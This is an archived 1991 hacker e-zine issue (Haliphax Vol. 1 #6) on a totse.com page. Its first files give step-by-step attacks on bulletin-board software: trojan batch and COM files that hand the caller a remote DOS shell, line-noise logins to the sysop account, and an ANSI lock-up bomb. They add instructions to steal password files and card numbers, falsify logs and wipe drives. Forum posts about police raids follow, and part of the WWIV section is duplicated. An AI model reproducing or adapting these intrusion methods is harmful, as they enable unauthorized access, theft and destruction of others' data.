totse.com | Haliphax - Volume 1, #6


	About


	Community


	Bad Ideas


	Drugs


	Ego


	Erotica


	Fringe


	Society

	Hack
		Hacker Zines
			CERT
			CHAL
			CHAOS
			CIAC
			CPD
			CPSR
			CRH
			CWD
			CuD
			CuD/A
			EFF
			LOL
			MOD
			Miscellaneous Phreak and Hacker Zines
			NIA
			RISKS
			UXU


	register \| bbs \| search \| rss \| faq \| about
	meet up \| add to del.icio.us \| digg it
	Haliphax - Volume 1, #6 NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site. ==Haliphax== Volume One, Issue 6, File 1 of XX Haliphax Inc. Newsletter Issue VI Index ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Welcome to Haliphax VI! This is like the new start of Haliphax. Well I met Dr. C on CyberNet 504-I a couple weeks ago and now's we're really getin into this stuff. He is an expert in viruses and programming so he's helping make Haliphax now! He's also an all around cool guy (and best of all, NOT a k-rad warez d00d). It feels good to be back with some way to spread info all around the bbs world! DISCLAIMER : This file is for information purposes only. Points on views in this magazine may or may not be the opinions of all the HaliphaX members. If you choose to use this textphile to do a boo-boo then don't blame us! EDITORS : iNVALiD MEDiA, Dr. C, Tym Phactor, Phantasm DISTRIBUTION : Stealth Technologies (504-PRI-VATE) Sysop : Dr. C Phortress Systems IV (602-PRI-VATE) Sysop : iNVALiD MEDiA Subject/Article Title: Author/Source ~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ Phile 1 : Bugs/Errors in ViSiON iNVALiD MEDiA Phile 2 : Bugs/Errors in AfterShock iNVALiD MEDiA Phile 3 : Crashing AfterShock (humor) Reaper of Vengeance Phile 4 : Crashing WWIV iNVALiD MEDiA (part II by Vision) Phile 5 : Operation Sun Devil II -Taken from posts on The Bust of "Mind Rape" -Grail Quest (602) -The Cardboard Box (602) -Zycor's Lair (602) Phile 6 : The Dark Avenger Source Code in Assembly Language Phile 7 : Making Ansi Trojans (from 1989 but still works) Phile 8 : Leprosy Source Code in Assembly Phile 9 : Leprosy Source Code in C Phile 10: General Virus Overview - Pt1 Dr. C Phile 11: Hacking Internet A. Uzziah Phile 12: Messages 1-376 on Lutzifer -Log file Phile 13: Haliphax Pro-Phile on Johnny Rotten (Sysop - CyberNet 504-I) (* The Phollowing is to be taken as humorous anarchy and not as REAL ) ( HaliphaX Material... ) Phile 14: Fucking Stuffed Animals iNVALiD MEDiA Phile 15: Da Story of Micro's HEX Life Tym Phactor ______________________________________________________________________________ Phile 1 : Bugs/Errors in ViSiON %%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Fucking w/ ViSiON .82-.83 % % by iNVALiD MEDiA % Edited 9/21/91 % //HaliphaX\\ % %%%%%%%%%%%%%%%%%%%%%%%%%%%%% There are a lot of Forum-PC hacks out there. One of my favorite hacks is LSD. LSD was made by Slavelord and is one of today's best (along with Celerity and in my opinion, ViSiON). ViSiON was made from the very buggy LSD 1.06 Source code which was stolen from Slavelord. ViSiON/X .90 is finally out. I have no experience with ViSiON .90 since I haven't even SEEN it yet, let along done anything with it. :: Locking up ViSiON :: There are many simple little ways to lock up a ViSiON board. 1) If you call voice and let it 'beep' for a considerable amount of time, and then hang up, it was fuck around with the modem on the sysop's end so if you call back RIGHT AWAY, it is still in the middle of initializing so it will on certain occasions lock it up. Works better on .82 than .83. 2) Hanging up in certain areas of the board will also lock it up for a while. If you just hang up in the middle of an ansi screem, the board will hang for a couple minutes before initilazing the sysop's modem again and if you keep calling while its locked up for the 2 minutes, it occasionally locks up. I have found this to work on both .82 and .83. :: Errors in Ymodem-G :: I have found a very serious error in Ymodem-G transfers. On half the boards running ViSiON, Ymodem-G is installed wrong. If you start a Ymodem-G transfer the sysop's side will mess up and NOT start sending you data. You wlil be in a nice little paralized, blank screen, no promt mode once you get out of Ymodem-G. You can't do anything. When you hang up and call again, it will log you into your account RIGHT when you connect. This is very dangerous. It does not happen if the Ymodem-G transfer goes well. This isn't just an error with YOUR protocols as some of you might be saying now; I have done it from other people's houses, different setups, etc and ran ViSiON myself. So if a Ymodem-G transfer in ViSiON gets messed up, CALL BACK or your account might be open for the next user who calls. This works mostly on ViSiON .83 boards; haven't had it happen in .82. This has been an iNVALiD MEDiA Productions! ______________________________________________________________________________ Phile 2 : Bugs/Erros in AfterShock %%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Crashing AfterShock BBS % % by iNVALiD MEDiA % % //Haliphax\\ % %%%%%%%%%%%%%%%%%%%%%%%%%%%%% :: Notes :: AfterShock is a good piece of software written by The FRiTZ. It is up to ver- sion 1.24 (as far as I know) but only version 1.22 is supposed to be out for the general public's use. I have 1.23 Beta which I found on some board out in Washington. :: File Transfers :: AfterShock has MANY bugs. One of them occurs in the file transfer area. When you upload a file, it does not get added to the file list; just stays on the sysop's drive until he gets a chance to add it to the list. This is one of the worst bugs in AfterShock. It occurs in ALL of the versions that I have seen since 1.20. :: Crashing AfterShock :: -=> Requirements <=- The BBS should not have a System Password. Your phone and modem have to be on the same line. Your phone has to be plugged directly into the wall so that it makes "line noise: when picked up! -=> The Crash <=- Login to your favorite AfterShock board as the System Operator. The SysOp's account is ALWAYS 1. When asked for the password, pick up the phone. This will generate a bunch of line noise to the board and if done right (try more than once) should pass the password prompt and log you into the sysop's account. Once you are in, you can use the % command from anywhere to go into the Sysop commands. I recomment doing it in the file section, adding an area. Add the main BBS file area (usually /SHOCK, /AFTER, /BBS, /AS122, etc). From there all any of the files that you want and SYSLOG.DAT. Then erase the files that you want ans SYSLOG.DAT which is the System Log. Also erase the errorlog. Download the CONFIG.. Shell to dos and modify the bbs configuration (also be sure to get the system passwords, etc) to make it so that doors are allowed on the system and remote door maintenance is allowed. Re-upload the config files (just the saved data file). Do a user edit, etc and get the sysop's password or just create a bullshit user and give him the highest access. Then log off and call back again. Log in under your newly acquired accounts and its off to work you go. You might wanna leach the sysop or totally trash his system. This has been an iNVALiD MEDiA production! Remember, do this but don't blame me if you get caught! heh this is for educational purposes only! ______________________________________________________________________________ Phile 3 : Crashing AfterShock (humor) Title: How to crash AfterShock 1.23 Updated: 4:52 pm at 8/20/91 Well, to hack AfterShock 1.23, try this, as noted in Virus Weekly. 1. Let the system operator know. If he doesn't answer the page, it's probably safe to go ahead and trash him. 2. Go into the message base. 3. Enter the third base on your area list. 4. Read the third message. 5. Quit immediately to the main menu. 6. Go to the door menu. 7. Open the first door. 8. Quit as soon as possible. 9. Send feedback to the sysop. This is needed, so why not cuss him out? You're gonna trash his system, so he won't notice. 10. Enter the file area. 11. Give yourself sysop access. (this is only available if you do the above EXACTLY) For the sysop access, hit ALT-H. 12. Quit back to the main menu. 13. Type //SHELL. 14. Screw over the board! ______________________________________________________________________________ Phile 4 : Crashing WWIV %%%%%%%%%%%%%%%%%%%%%%%%%%%% % Crashing a WWIV Bbs! % % by iNVALiD MEDiA % Updated 9/21/91 % // Haliphax \\ % %%%%%%%%%%%%%%%%%%%%%%%%%%%% * NOTE * Part II was taken from a text file called WWIVHACK.ZIP written by Vision. -=> Part I <=- Ok log on to your favorite WWIV bbs and say that you are new to bbsing and give the lame sysop some bullshit about yourself. He'll fall for it and you'll be validated! :: Low Security WWIV :: Log on to the board, go into the file area, upload a file called TEST.ZIP to the bbs. Make sure the uploaded don't go to the sysop! In the TEST.ZIP file you should have the file called PKUNZIP.BAT. The pkunzip.bat file should consist of these lines: CTTY COM1 (or whatever com port he's using) COMMAND.COM (or C:, CD\, COMMAND.COM if its not in his path) Type E to get into the extract commands of the system. It gives you a prompt like this - Extract to temporary directory: Filename: {This is where you type in TEST.ZIP} Filename: TEST.ZIP TEST.ZIP : 3k : Description of File that you uploaded Extract What (?=list,Q=abort) ? From there, type * . The Software will run extract all the files from the TEST zipfile and will extract the pkunzip.bat file. When you get the Extract What (?=list,Q=abort) ? prompt again, type * once again. The stupid software will now run you PKUNZIP.BAT file instead of PKUNZIP.EXE and you're in DOS! [See -What to do in DOS-] :: High Security WWIV :: What I mean by this is 1) all uploads go to the sysop 2) New User Password 3) Invite Only 4) Uses different ansi drive 5) etc etc... you get the general idea, don't you. Well in this type of situation, just log on apply and maybe get validated. Get a pd or a pirate file and stick the PKUNZIP.BAT file in the zip. Onlu this time, put some extra bullshit lines in the pkunzip.bat file like this : CTTY COM1 If Exist AAAAA.AAA goto SUCKER C: CD\ COMMAND.COM :sucker Put a list of a trillio DOS commands or some ECHO statements here... Once you do this, compile it and you'll have a PKUNZIP.COM thats about 20 or so k in length. Make it as close to the REAL pkunzip.exe size as possible. Stick that pkunzip.com fake file into your legit pirate ware and upload it to the sysop. He'll check it out (and probably won't notice the PKUNZIP.COM file) and then stick it online. Thats when you do the work! :: What to do in DOS :: Well, he's it put simply... go into the GFILES dir, type out the .log files and capture them into a small text file... modify them to make it look like nothing happened and upload them again. Edit the LASTON.TXT file too. This way, the sysop won't know that anything happened! :: Other Ways to do Shit :: To lock up a bbs, do this: Make an ansi and put this line in it : ESC [23;1234567891011 This will lock up the bbs. Put this into multiple emails so whenever someone logs onto the bbs, it will lock up. Or stick it somewhere where it will be seen a lot and not noticed by the sysop (PD subs on a pirate board, Email, to give you a few ideas). Another way is to just slam on the keyboard if you enter a door that shrinks when it runs... this is really simple but works!! Hope this will let you ruin your favorite lame ass WWIV board! Sysops, to stop this from happening, 1) take out the extract commands or rename pkzip/pkunzip to something really unique that a hacker won't figure out and use those filenames in place of pkzip/pkunzip in the INIT program. 2) Use a different ansi driver so that ansi bombs will not be as effective. 3) Have a New User Password and make sure that New Users have NO ACCESS to the file section/message areas. If you want them to have post access, give them the M restriction. :: Extra Notes :: When in the GFILES directory of WWIV, type out the log file (eg 092191.LOG) for the day and log it to disk. Go into your text editor and edit the logged file and make it look like nothing happened. Then use DSZ rz on the sysop's end and send him the file. This is better than just erasing the log files because the sysop won't grow as suspicious. -=> Part II <=- (by Vision) :: The DSZ Backdoor :: The method is old and I don't think it will work on the newer WWIV's. In fact, I KNOW it won't work on the newer WWIV's. There was a scare way back when in 602 when some dude crashed a lot of the WWIV boards with this process. Since then a lot of boards in 602 and everywhere else became cautious of this... * Requirements of BBS ** 1) Unmodified WWIV 2) Unregistered DSZ 3) Stupid Sysop 4) The bbs has to be in a network (WWIVLink, WWIVNet, or some local one) Ok call up your favorite WWIV board under a false handle and bullshit your way into access (if you're too stupid to do this, you're too stupid to do THIS). It is better to do this to a lame PD board since they don't have access to shit that registers WWIV; the pirate boards usually do. Make sure the sysop have an unregistered copy of DSZ installed. It is important that it be unregistered. If its registered, try the Extract Commands. Ok now before you actually do the fun thimg (crash the board!), you have to create a few files. These files are : 1) DLZ.BAT This file will let you download files from the sysop's hard drive. This file should contain the lines : CLS CTTY CON DSZ port1 speed2400 sz %1 {whatever baud the sysop is at} CTTY COM1 {whatever com port the sysop is at} CLS 2) HACK.BAT This is the actual file that will get you into the sysop's DOS. This file should contain the lines : CTTY COM1 {whatever com post the sysop is at} C: {just in case enter these lines. Some sysops are smart!} CD\ COMMAND.COM 3) NETWORK.COM This is the file that runs during the net hours. In QuickBasic, the file is : SHELL "DEL NETWORK.COM" SHELL "HACK.BAT" Compile & link it to NETWORK.EXE then rename it to NETWORK.COM. This will delete itself and run HACK.BAT. If you want, do it in Pascal or any other language that you are good at. It won't make ANY difference. Call back and go straight to the transfer section. Upload (to any directory, or directly to the SysOp). When prompted for the file name, enter "????????.???" (eight ?'s then three ?'s, without the quotes). You'll see the Zmodem receive string. Upload one of the above files. The BBS will say, "transfer aborted"... but you know better! Repeat until all files have been uploaded. Call back very shortly afterwards (thirty seconds, no more, no less). When you get the "NN:" prompt, enter "!-@NETWORK@-!" (again, no quotes). This will access the unpassworded WWIVnet account (the password routines are external). When the BBS sees this, it will drop to DOS and run NETWORK.EXE. However, since COMs are run before EXEs, your NETWORK.COM will be executed promptly turning control over to you via HACK.BAT! Now that you are in DOS, there are a few things that you must immediately do. Use DLZD.BAT to leech the target's CONFIG.DAT from his main BBS directory (the one you were dumped in when you arrived). The format is: DLZ <filename> where <filename> is the name of the file. For example, DLZ CONFIG.DAT will leech the configuration file. Go to his BBS DATA directory. This is usually C:\WWIV\DATA, but you might have to look around a little bit. When you find it, use DLZ to leech the target's USER.LST. Using Norton Utilities or any hex and/or text editor, it is very easy to see where the usernames and their passwords are stored. Go into the GFILES directory and type out the Sysop Log (911232.log or whatever the current date is). Log them to disk and modify them. Then upload them. If you want to make it faster, just erase them! If the target is in WWIVnet or WWIVlink, download his/her CALLOUT.NET file fro the aforementioned data directory. This will be explained later. Delete HACK.BAT if you haven't already! Look around. Leech anything that looks interesting. This includes: :~ Private G-Files from the G-File section Good for _: Lists of credit-card or calling-card numbers blackmail : Pirate files : His dialing directories from Telemate or Telix; these usually : contain passwords and numbers of private BBS's! : If he is of age and has a job, you might be able to leach some : PRIVATE information! ~ Hang up. If you really hate him, upload Norton's WIPEDISK.EXE along with the rest of the files, run it, and permanently destroy all data on his drive. This is generally not recommended, because so far he has NO WAY of knowing you were in unless he watched. --------- Tips: --------- a) In the target's logs, nothing will show except that you hit 'U' when you were online and quit before the upload started. This is virtually always overlooked, and logs more than two days old are usually deleted. b) In the target's net logs, he'll probably see a >NO NET<, which is rather common. c) Very close to the beginning of CONFIG.DAT and right before the first directory entry (usually "MSGS\") you will find the target's SYSTEM PASSWORD. This is needed if you are going to log on as him or a remote sysop. d) If a sysop logs on, it is not noted in the LAST FEW CALLERS screen OR the logs. e) A few commands that you will want to try out when you are online as #1 are: //DOS //UEDIT //BOARDEDIT //DIREDIT //GFILEEDIT //CHUSER In the file section try: //UPLAOD //SORT //MOVE R Most require the system password, but if you're online as the sysop you already have that. f) You can have great fun with planted and rouge mailing if you have a copy of WWIV and the victim's CALLOUT.NET. CALLOUT.NET has a little note after every entry that looks something like: "KAOIYQIGNADFUKG" Or another random password. Read WWIVTECH.DOC and W (available on most WWIV boards) for more information. You should be able to pick up/drop off mail supposedly from and to your target very easily for about a week. When you start getting >BAD PASSWORD<, get back into your victim's DOS and get the passwords again! g) You should be able to figure out what to do with the password file. h) NEVER, NEVER, NEVER press backspace when there is nothing to backspace! This will have catastophic effects and will definintel crash CTTY! i) This file is provided to inform WWIV sysops of this threat. If somebody uses it for "bad" purposes, it is not my fault. Later! \ / <=---\----/--i--s--i--o--n---=> \/ Or another random password. Read WWIVTECH.DOC and W (available on most WWIV boards) for more information. You should be able to pick up/drop off mail supposedly from and to your target very easily for about a week. When you start getting >BAD PASSWORD<, get back into your victim's DOS and get the passwords again! g) You should be able to figure out what to do with the password file. h) NEVER, NEVER, NEVER press backspace when there is nothing to backspace! This will have catastophic effects and will definintel crash CTTY! i) This file is provided to inform WWIV sysops of this threat. If somebody uses it for "bad" purposes, it is not my fault. ______________________________________________________________________________ Phile 5 : <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> <> Operation Sun Devil II - The Gail Thackery Fan Club <> <> Compilation from posts in the 602 Area Code <> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> File : 602BUST.SEP Desc : Posts pertaining to 602's recent legal problems in September of '91 Orgn : Post taken from The Grail Quest (602-256-0106) and The Cardboard Box (602-247-3754) and Zycor's Lair (602-957-6436) Ok here's whats happening, Operation Sun Devil II is is full effect. This is a collection of posts from a few boards talking about the recent busts. NSA is really involved in this. So is The Love Connection (??? distro). This file was compiled by iNVALiD MEDiA ? start of phile : ????????????????????????????????????????????????????????????????????????????? 47/50: .. Name: Irie Man #3 @16209 Date: Sun Sep 22 02:03:39 1991 Do Not Call The Love Connection! .. LEGAL PROBLEMS FROM HELL! .. I'm Outta here till shit clears up! have fun people.. .. IRIE MAN IS OUTTA HERE!! 49/50: Taurus Name: Lord Dimwit Flathead #18 @16209 Date: Sun Sep 22 11:12:08 1991 Hmm...logged on today to find a message from Taurus/Switchblade/Bonzai, threatening with the fact that "he had all my stats phone, address, anem credit card info"...gee, whatta a K-Rad guy! Why don't you bust his sorry ass, Merovingian? This guy is a class-A loser...what in the hell does he contribute to the board, other than being the "village idiot"...? 50/50: If I'm correct... Name: The Assembler #192 @16209 Date: Sun Sep 22 18:22:55 1991 RE: ... The whole search warrent could be turned over in court if they siezed things like that on it??? You at least have grounds to sue on "Illegal Siesure" grounds... 38/50: ... Name: Astro #402 Date: Sun Sep 22 06:51:49 1991 The following is (sort of) a public service announcement. Please don't delete this for it is important that as many people as possible see it. You may edit and words you deem offensive out, but please leave the content of the message intact. Thank You.: The Phoenix Police Department/Federal Beareu of Investigations and many other "reputable" organizations have conducted an etrosity upon the community. They have confiscated many numerous items not pertaining to the investigation being conducted. They have trashed/slashed/stolen many things that have NOTHING to do with computer equipment whatsoever. An issued warrant for the search and seizure of computer matterials was turned into a field day for overambitious and undertrained "special agents" of these organizations. These organizations include: Phx. PD, FBI, LDL, IBM, etc. What does a high school diploma, yearbook, and college acceptance certificate have to do with computer conspiracy?!?! Absolutely fucking NOTHING! Well, that is all, I guess. Only because I can't think of anything else to say. Except that the last two days were uncalled for and total bullshit! Now, I will admit SOME of the accusations of certain crimes are true. Most of them aren't. The main reason for this post is because of the appauling treatment of said property and person (you know who, and if you don't, you should pay better attention). Not to mention the fact that this post was requested by someone EXTREMELY involved. 39/50: We will leave it intact, or at least I will. Name: Madman #56 Date: Sun Sep 22 07:13:17 1991 RE: ... But a yearbook could be used to get pictures or leads on associates, diplomas and acceptance certificates would not do much except fill in as hard proof where someone was going to school. But those are minor things... As with a search, though, I think they can take ANYTHING they want as long as it is in the place covered by the warrant... ????????????? ?? MADMAN! ?? ????????????? 41/50: I have no respect... Name: Bugs #24 Date: Sun Sep 22 12:02:16 1991 RE: Actually for hackers. Period. It dosen't make any sense. And I see no reason for that kind of destructive behavior. I could shoot a hacker. ~~~\/BUGS 42/50: I'd Name: Bugs #24 Date: Sun Sep 22 12:05:38 1991 RE: ... Like to hear what infractions DID occur? The FBI dosen't waste their time on bullshit. You said there were "SOME" accusations that were true. WHAT WERE THEY? ~~~\/BUGS 43/50: Seizures During Searches Name: Steve #136 Date: Sun Sep 22 15:04:33 1991 From what I know (only hearsay) when a warrant is served, it has to describe the item(s) being sought and that is the only thing they can confiscate. If they are searching for, say, cocaine, then if they find plastic explosives, they have to get another warrant to seize it. Anyone who knows please correct or dispute my assertions. 44/50: replies.... Name: Full Moon #12 Date: Sun Sep 22 17:17:43 1991 first off, yeah the fbi does waste its time on bullshit..... prime example: Steve Jackson Games. second, piracy is something that is incredibly minor to federals, at least for the time being, and hacking and phreaking take priority for obvious reasons. in fact, i havent seen any pirate boards go down, with the exception of really big ones in florida and missouri. most hacker/phreaker type don't play the pirate game anyway. and not all hackers are destructive. i could shoot someone who would shoot me. Period. thank you, and please keep your fish out of the ceiling. 45/50: isn't Name: The Rush #590 Date: Sun Sep 22 17:29:02 1991 it instead of taking whatever is on the list, taking every piece of computer equipment that a person owns who may be caught and then the officer or whoever is seizing the equipment has to make a list of whatever they're taking? That's the way I always saw it. good luck I think you may need it. The Rush 46/50: ... Name: Damaged #303 Date: Sun Sep 22 17:53:15 1991 RE: I have no respect... Bahaha, coming from a Unknown location, dude! You are a fucking moron! Most Hackers are NOT destructive! You believe media lies to MUCH! DAMN 47/50: and Name: Damaged #303 Date: Sun Sep 22 17:54:59 1991 Also they DID NOT include items that they took, and put them on the list! 48/50: bugs.. Name: The Toad #68 Date: Sun Sep 22 19:38:27 1991 RE: I have no respect... go to hell I was never destructive dud eyo ugot it all wrong, one rule I go bye is : Never destroy what you do not need to. only cover your tracks. Not ALL of us are/WERE destructive, nother week to go and i'll feel safe (partially). 49/50: See... Name: Bluejay Bandit #183 Date: Mon Sep 23 00:33:30 1991 If NSA was "smart", which they have proven otherwise, they would NEVER have HAD this problem... The Feds are out there. And they know who you are and what you do. Whether they choose to DO something about or just let if keep happening until something "larger" comes about, thats totally up to them. Your life is scrutinized day in, day out. You are not free. You are on a leash. Remember that.... / 50/50: Oh... Name: Bluejay Bandit #183 Date: Mon Sep 23 00:44:40 1991 and that virus. Is it that one written in PASCAL that writes itself to selective .EXE's on a disk? #5 I think it was? Easily killable. Nothing to worry about, people. 50/50: ... Name: Invalid Media #243 @16209 Date: Sun Sep 22 22:48:38 1991 Was anyone seriously busted in this thing or is it just fear of getting busted? Was Love Connected busted... Is this gonna be Sun Devil II? Over past month and a half I have seen 2 people gotten calls from the FBI... concerning hacking/phreaking and boards... iNVALiD MEDiA 50/50: To all of you in trouble... Name: Binary #18 Date: Mon Sep 23 01:41:21 1991 Well, I don't know you (i think) and I don't know the whole story... But good luck anyway... -=[<>]=-Binary-=[<>]=- Step right up folks... ANARCHY for sale!!! 50/50: Love Connection Name: Two Wheel Demon #30 Date: Mon Sep 23 13:15:58 1991 RE: Hey man the same post was up at Cardboard box, seems that Love Connectiona nd Toad are running scared, I wasn't in town so I don't know what was happening, can anyone fill me in, where they busting computer users again. 42/50: .. Name: Irie Man #3 @16209 Date: Mon Sep 23 02:03:18 1991 Someone E-mail me on EVERYTHING about Gail Thachery..I found out something tonight and I want to know everything about this bitch! CAT..ASTRO..DD..and others Close friends Call me ASAP! I Just talked to the MAN..and I have to talk at someone. 44/50: ... Name: Astro #152 @16209 Date: Mon Sep 23 02:27:08 1991 RE: If I'm correct... Illegal search and seizure, destruction of priv. property, harrassment, invasion of privacy, deformation of character, theft, etc... 45/50: ??? Name: Astro #152 @16209 Date: Mon Sep 23 02:28:51 1991 RE: ... Love Connection WAS NOT busted. Just taken down for security reasons. WHO got calls???? It's important for you to tell me this. E-Mail me. L8r 47/50: Astro... Name: Opus #121 @16209 Date: Mon Sep 23 10:34:01 1991 RE: ... What's else is fucking new? The Feds are invincible and answer to no one. You're screwed and it's not the first time... [Opus] 48/50: the Name: Goliath #67 @16209 Date: Mon Sep 23 11:56:42 1991 RE: de sausage king of Chicago is Abe Froehman. goodie gum-drops 49/50: hey Name: Goliath #67 @16209 Date: Mon Sep 23 11:57:55 1991 RE: Things that make you go "Hmmmmm"........... Nexus did you know you are named after a shampoo? just a though This is the Ctrl-D Macro/s 50/50: It's doctors and lawyers and Name: The Masked Poster #255 @16209 Date: Mon Sep 23 13:06:22 1991 The end of the world... Sorry, I'm just feeling a little superior tonight... Another fucking heather?? No dad, what about you??? FUCK YOU!!! The truth is a virus Talk Hard 30/50: ... Name: Astro #402 Date: Mon Sep 23 05:43:13 1991 RE: We will leave it intact, or at least I will. Well, for one thing, he wasn't IN the yearbook, and his mom told them that (while pinned to the kitchen table). As for "anything", NO! The warrant specicied "COMPUTER EQUIPMENT", which they took. They ALSO took clothes, furniture, milk crates (?!?!), and the rest of his room. 90% of the things that they "confiscated" had nothing to do with ANYTHING. 31/50: ... Name: Astro #402 Date: Mon Sep 23 05:44:29 1991 RE: I have no respect... Misconceptions will be your undoing... 32/50: ... Name: Astro #402 Date: Mon Sep 23 05:47:22 1991 RE: I'd Using outdials and doing exchange scans. WHOOOOPIE! Gee, arrest half the BBS community! As for infractions on their part, illegal search and seizure, harrassment, deformation of character, destruction of priv. property, the list goes on.... 33/50: All true. Name: Astro #402 Date: Mon Sep 23 05:50:19 1991 RE: Seizures During Searches ALSO, if they find, say, computer disks, they ARE NOT allowed to use them or even do a directory on them. Same goes for video. If the police find a video tape of you molesting 6 year olds, that is not valid evidence for they are not allowed to view it... 34/50: ... Name: Astro #402 Date: Mon Sep 23 05:52:19 1991 RE: isn't Nope, in an inventory search, they can take ONLY what's on the warrant... 35/50: !!! Name: Astro #402 Date: Mon Sep 23 05:56:55 1991 RE: See... Sorry, bud, but NSA has nothing to do with this. For some reason, this is personal... 36/50: So has anything happened Name: Two Wheel Demon #60 Date: Mon Sep 23 08:08:06 1991 concerning the post from the Toad about another Sun Devil operation. Did people get busted while I was gone???? ?? ? Tw? Wh??? D?m?n ? ?? 37/50: Now Name: Madman #56 Date: Mon Sep 23 09:32:11 1991 RE: ... that sounds a bit much...maybe a good lawyer would be in order. I will ask a person I know on another board about warrants and such and see what he says and get back to you... ????????????? ?? MADMAN! ?? ????????????? 38/50: Sorry to bust your bubble Toad! Name: The Grunt #20 Date: Mon Sep 23 10:27:41 1991 But Hacking can be a very serious felony, and on very serious felony there is no date when you will be safe! Prosecution can take place in 20 years on that! There is no limit for conviction on a serious felony! Most likely (Since you are a little kid) you did not commit a serious felony. But, the lowest felony charge can be prosecuted after 3 years! ??????? ??????? ??????? 39/50: ... Name: Damaged #303 Date: Mon Sep 23 11:01:08 1991 RE: Oh... hahahaha, there are 6 versions of it. And all of them translated to C 40/50: All I've got to say about hacking... Name: Bugs #24 Date: Mon Sep 23 11:39:30 1991 is this. I stick by the statements I've made and I'd like to add this. If hackers had real lives, by that I mean getting some sunshine and getting laid instead of hugging a compute all day they wouldn't be in as much trouble as they are in. If this is their idea of recreation; stealing hard working people's ideas and work then I want no part of it. I'm also in favor of even more strict laws prohibiting idiots who obviously can't govern themselves. I must also admonish the sysops of this board for allowing blatant members of such behavior to stay on board here. Whatsa matter? 'Fraid that if you try to eliminate them they'll crash your board? ~~~\/BUGS 41/50: Searched by the feds Name: Troubled Youth #115 Date: Mon Sep 23 12:31:29 1991 RE: replies.... 10 times, always for fiber samples. Never found a match. Don't worry, be happy. 42/50: may] Name: Goliath #399 Date: Mon Sep 23 13:46:26 1991 RE: I'd... be that's because you don';t know any hackers Bugs. Probably because no one likes you anyway. 43/50: ... Name: Damaged #303 Date: Mon Sep 23 15:19:23 1991 RE: All I've got to say about hacking... This proves you ARE A FUCKING IDIOT! One "True Hackers" do not CRASH Boards, only idiots that do that. 2! If it WASN'T for HACKERS, you wouldn't be sitting here BBS'N! Hackers CREATED this world! 3. Hackers do live a life also! But what is wrong witha little computer liking, Hell! I fucking sit my compter for hours upon ends, and I still have time for my girl, partying, talking to friends and STILL go to college (well ). I'm sorry but you are so uninformed that, you are engaging without a life preserver!5??????* 44/50: bahahaha Name: The Toad #68 Date: Mon Sep 23 18:04:12 1991 RE: All I've got to say about hacking... REal lifes? bahaha dude you do not know most of us, Also I would NEVER NEVER take down this board, for some reason I am fond of this board. More strict laws? bahahaha that would only create more hackers, for one I do know as a fact if ALL information was FREE to the public there would be NO TRUE HACKERS, If phone bill swere owered there would be no reason for people to phreak. And MADMAN be afraid of us? I cerntinly hope not. 45/50: I hafta Name: The Rush #590 Date: Mon Sep 23 18:23:44 1991 admit - I don't have any problems with hackers. I stay outa their business. They get treated like crap, though, and that really sucks. Because a lot of people don't pay taxes (I'm not pointing fingers at anyone on this board, just some people in general), yet they get at least halfway decent treatment by others. 46/50: actually bugs.... Name: Full Moon #12 Date: Mon Sep 23 18:47:18 1991 RE: All I've got to say about hacking... the sysops here have open minds and they believe EVERY side of a story should be told. some of what you said might be true, but your misconceptions fail you... i believe none of these guys 'stole' anything or damaged anything, besides maybe phone time. these guys are very smart, most of the bbs population (such as yourself) wouldn't know the first things to do to hack into an orange. i am glad your opinions are only opinions, otherwise misconceptions and lack of understanding would rule the bloody country. and a note, i am not defending what they did, i am defending their right to defend themselves. and people like bugs piss me off. he stands as the ultimate 'joe public' who makes definitative judgements without getting his bloody facts straight. thank you and god bless.... 47/50: good point Name: Full Moon #12 Date: Mon Sep 23 18:48:22 1991 RE: ... this little cyberspace world was created by hackers. or didnt bugs know that? 48/50: Hmmm... Sounds like a few people had a Hell Week... Name: The Crazy Zonie #368 Date: Mon Sep 23 21:26:56 1991 Sorry for jumping in like this... 1) Would someone please email me on what the "Charges" Were? (I don't have to know what was true or not. Just what the FBI was searching for!) 2) The Police (All investigative forces) are only to take what's listed on the Warrent! That means that they can tear up your room to find it, but they can only take those objects RELATED to the search warrent! (You can bust them by having an Itemized list of all that was NOT involved with the crime that disappered!) 3) Pirating- I don't really approve of it, but there is no way to get started in the Computer Arina without getting some hardware illeagally! (Basically, I do not know of anyone who doesn't have something illeagle!) 4) VIRUSES?!?!?! I'M SORRY, BUT THAT IS JUST ONE AREA OF PROGRAMING THAT I WILL NOT STAND FOR!!! FOR THE MOST PART, WE'RE FRIENDS, SO WE DON'T NEED SOME PUBESENT BRAT TRYING TO DOWN ALL UNSUSPECTING PEOPLE (pretty much everyone!) COMPUTER! I WILL NOT STAND FOR BENINE VIRUSES AND SUCH JUST FOR THE SAME PRINCIPLE! I DO NOT GO ARROND AND TRY TO DO DILIBRATE MALACE TO THE REST OF YOU, AND I EXPECT THE SAME BACK! 5)Hacking... Well, like the Pirating, same thing... Well, for the most part, I wish for the best! The Crazy ZOnie... Sorry for such a long post! 49/50: Hacking/Cracking Name: The Whiz Kid #78 Date: Mon Sep 23 23:36:52 1991 Hacking for the most part is trying to gain access to a board, with the intention of leeching, obtain private records/files or crashing the board itself... On the Other hand, you Idea of a hacker, is really that of a Cracker... Crackers started the BBSing world with their Internation network of pirated software, from HQ to Safe-Houses... I've been in this bbs world for over 5 years and ??I know what goes on, in fact I used to be with a group at one time (Big deal, it suxed too) Black Boxes, Phreaking, ect: All I can say, is uhm, well expect a cop knocking on your door before you log off.. TWK (The Obtainig private records and Files also includes hacking MCI codes) 50/50: hmm Name: Full Moon #12 Date: Tue Sep 24 00:20:11 1991 yeah pirating is software, not hardware. a bit of credit cards are for hardware... and when i was 10 i stole this little garfield thing.... As it seems, since "The Great Purge", the message bases have dropped down in activity. I respectfully request that all users find the time to add a few more posts out there. 47/50: Actually Name: Madman #56 Date: Tue Sep 24 03:29:01 1991 RE: All I've got to say about hacking... as long as they do not break the rules, we do 